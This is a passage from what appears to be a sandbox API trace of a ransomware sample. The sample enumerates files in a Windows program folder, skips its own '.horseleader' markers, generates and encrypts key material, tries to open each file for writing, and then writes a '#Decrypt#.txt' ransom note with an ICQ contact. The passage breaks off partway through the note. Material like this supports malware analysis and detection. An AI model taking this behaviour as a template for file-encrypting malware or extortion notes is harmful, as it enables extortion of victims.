nFileSizeLow=0x11da, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="1047x576black.png", cAlternateFileName="")) returned 1 [0251.723] lstrcmpiW (lpString1="1047x576black.png", lpString2="Windows") returned -1 [0251.723] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047x576black.png") returned 70 [0251.723] StrStrIW (lpFirst="1047x576black.png", lpSrch=".horseleader") returned 0x0 [0251.724] lstrcmpW (lpString1="1047x576black.png", lpString2="#Decrypt#.txt") returned 1 [0251.724] lstrcmpW (lpString1="1047x576black.png", lpString2="_uninstalling_.png") returned 1 [0251.724] lstrlenW (lpString=".testttjffg") returned 11 [0251.724] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047x576black.png", lpSrch=".testttjffg") returned 0x0 [0251.724] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.724] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.724] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047x576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\1047x576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.724] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f316407, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f316407, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee26b73, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x11da, 
dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="1047_576black.png", cAlternateFileName="")) returned 1 [0251.724] lstrcmpiW (lpString1="1047_576black.png", lpString2="Windows") returned -1 [0251.724] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047_576black.png") returned 70 [0251.724] StrStrIW (lpFirst="1047_576black.png", lpSrch=".horseleader") returned 0x0 [0251.724] lstrcmpW (lpString1="1047_576black.png", lpString2="#Decrypt#.txt") returned 1 [0251.724] lstrcmpW (lpString1="1047_576black.png", lpString2="_uninstalling_.png") returned 1 [0251.724] lstrlenW (lpString=".testttjffg") returned 11 [0251.724] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047_576black.png", lpSrch=".testttjffg") returned 0x0 [0251.724] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.724] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.725] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\1047_576black.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\1047_576black.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.725] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f3626c1, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f3626c1, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee26b73, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13e0, dwReserved0=0x7e1110, 
dwReserved1=0xfbc691b5, cFileName="NavigationLeft_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.725] lstrcmpiW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.725] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_ButtonGraphic.png") returned 85 [0251.725] StrStrIW (lpFirst="NavigationLeft_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.725] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.725] lstrcmpW (lpString1="NavigationLeft_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.725] lstrlenW (lpString=".testttjffg") returned 11 [0251.725] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.725] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.725] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.725] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationleft_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.725] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f3626c1, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f3626c1, ftLastAccessTime.dwHighDateTime=0x1ca03fb, 
ftLastWriteTime.dwLowDateTime=0x4ee26b73, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc3a, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationLeft_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.725] lstrcmpiW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.726] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_SelectionSubpicture.png") returned 91 [0251.726] StrStrIW (lpFirst="NavigationLeft_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.726] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.726] lstrcmpW (lpString1="NavigationLeft_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.726] lstrlenW (lpString=".testttjffg") returned 11 [0251.726] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.726] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.726] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.726] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationLeft_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationleft_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.726] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, 
ftCreationTime.dwLowDateTime=0x6f38881e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f38881e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee26b73, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x13a1, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.726] lstrcmpiW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.726] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_ButtonGraphic.png") returned 86 [0251.726] StrStrIW (lpFirst="NavigationRight_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.726] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.726] lstrcmpW (lpString1="NavigationRight_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.726] lstrlenW (lpString=".testttjffg") returned 11 [0251.726] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.726] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.726] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.727] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_ButtonGraphic.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationright_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.727] 
FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f38881e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f38881e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee26b73, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc2e, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationRight_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.727] lstrcmpiW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.727] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_SelectionSubpicture.png") returned 92 [0251.727] StrStrIW (lpFirst="NavigationRight_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.727] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.727] lstrcmpW (lpString1="NavigationRight_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.727] lstrlenW (lpString=".testttjffg") returned 11 [0251.727] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.727] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.727] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.727] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationRight_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationright_selectionsubpicture.png"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.727] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f33c564, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f33c564, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee26b73, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x135b, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_ButtonGraphic.png", cAlternateFileName="")) returned 1 [0251.727] lstrcmpiW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="Windows") returned -1 [0251.727] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_ButtonGraphic.png") returned 83 [0251.727] StrStrIW (lpFirst="NavigationUp_ButtonGraphic.png", lpSrch=".horseleader") returned 0x0 [0251.728] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="#Decrypt#.txt") returned 1 [0251.728] lstrcmpW (lpString1="NavigationUp_ButtonGraphic.png", lpString2="_uninstalling_.png") returned 1 [0251.728] lstrlenW (lpString=".testttjffg") returned 11 [0251.728] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_ButtonGraphic.png", lpSrch=".testttjffg") returned 0x0 [0251.728] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.728] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.728] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_ButtonGraphic.png" (normalized: 
"c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationup_buttongraphic.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.728] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f33c564, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f33c564, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee26b73, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc09, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="NavigationUp_SelectionSubpicture.png", cAlternateFileName="")) returned 1 [0251.728] lstrcmpiW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="Windows") returned -1 [0251.728] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_SelectionSubpicture.png") returned 89 [0251.728] StrStrIW (lpFirst="NavigationUp_SelectionSubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.728] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.728] lstrcmpW (lpString1="NavigationUp_SelectionSubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.728] lstrlenW (lpString=".testttjffg") returned 11 [0251.728] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_SelectionSubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.728] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.729] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.729] 
CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\NavigationUp_SelectionSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\navigationup_selectionsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.729] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f2f02aa, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f2f02aa, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee4ccd1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x5e02, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="push.png", cAlternateFileName="")) returned 1 [0251.729] lstrcmpiW (lpString1="push.png", lpString2="Windows") returned -1 [0251.729] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push.png") returned 61 [0251.729] StrStrIW (lpFirst="push.png", lpSrch=".horseleader") returned 0x0 [0251.729] lstrcmpW (lpString1="push.png", lpString2="#Decrypt#.txt") returned 1 [0251.729] lstrcmpW (lpString1="push.png", lpString2="_uninstalling_.png") returned 1 [0251.729] lstrlenW (lpString=".testttjffg") returned 11 [0251.729] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push.png", lpSrch=".testttjffg") returned 0x0 [0251.729] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.729] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.730] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD 
Maker\\Shared\\DvdStyles\\Push\\push.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\push.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.730] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f3ae97b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f3ae97b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee4ccd1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb92, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="pushplaysubpicture.png", cAlternateFileName="")) returned 1 [0251.730] lstrcmpiW (lpString1="pushplaysubpicture.png", lpString2="Windows") returned -1 [0251.730] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\pushplaysubpicture.png") returned 75 [0251.730] StrStrIW (lpFirst="pushplaysubpicture.png", lpSrch=".horseleader") returned 0x0 [0251.730] lstrcmpW (lpString1="pushplaysubpicture.png", lpString2="#Decrypt#.txt") returned 1 [0251.730] lstrcmpW (lpString1="pushplaysubpicture.png", lpString2="_uninstalling_.png") returned 1 [0251.730] lstrlenW (lpString=".testttjffg") returned 11 [0251.730] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\pushplaysubpicture.png", lpSrch=".testttjffg") returned 0x0 [0251.730] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.730] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.730] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD 
Maker\\Shared\\DvdStyles\\Push\\pushplaysubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\pushplaysubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.730] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f38881e, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f38881e, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee4ccd1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xb70, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="push_item.png", cAlternateFileName="")) returned 1 [0251.731] lstrcmpiW (lpString1="push_item.png", lpString2="Windows") returned -1 [0251.731] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_item.png") returned 66 [0251.731] StrStrIW (lpFirst="push_item.png", lpSrch=".horseleader") returned 0x0 [0251.731] lstrcmpW (lpString1="push_item.png", lpString2="#Decrypt#.txt") returned 1 [0251.731] lstrcmpW (lpString1="push_item.png", lpString2="_uninstalling_.png") returned 1 [0251.731] lstrlenW (lpString=".testttjffg") returned 11 [0251.731] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_item.png", lpSrch=".testttjffg") returned 0x0 [0251.731] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.731] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.731] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_item.png" 
(normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\push_item.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.731] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f3ae97b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f3ae97b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee4ccd1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbb8, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="push_title.png", cAlternateFileName="")) returned 1 [0251.731] lstrcmpiW (lpString1="push_title.png", lpString2="Windows") returned -1 [0251.731] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_title.png") returned 67 [0251.731] StrStrIW (lpFirst="push_title.png", lpSrch=".horseleader") returned 0x0 [0251.731] lstrcmpW (lpString1="push_title.png", lpString2="#Decrypt#.txt") returned 1 [0251.731] lstrcmpW (lpString1="push_title.png", lpString2="_uninstalling_.png") returned 1 [0251.731] lstrlenW (lpString=".testttjffg") returned 11 [0251.731] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_title.png", lpSrch=".testttjffg") returned 0x0 [0251.731] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0251.731] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0251.732] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\push_title.png" (normalized: "c:\\program files\\dvd 
maker\\shared\\dvdstyles\\push\\push_title.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0251.732] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6f3ae97b, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x6f3ae97b, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ee4ccd1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbb8, dwReserved0=0x7e1110, dwReserved1=0xfbc691b5, cFileName="push_title.png", cAlternateFileName="")) returned 0 [0251.732] FindClose (in: hFindFile=0x7c6760 | out: hFindFile=0x7c6760) returned 1 [0251.733] wnsprintfW (in: pszDest=0x7dc820, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\#Decrypt#.txt") returned 66 [0251.733] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Push\\#Decrypt#.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\push\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x158 [0251.735] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact 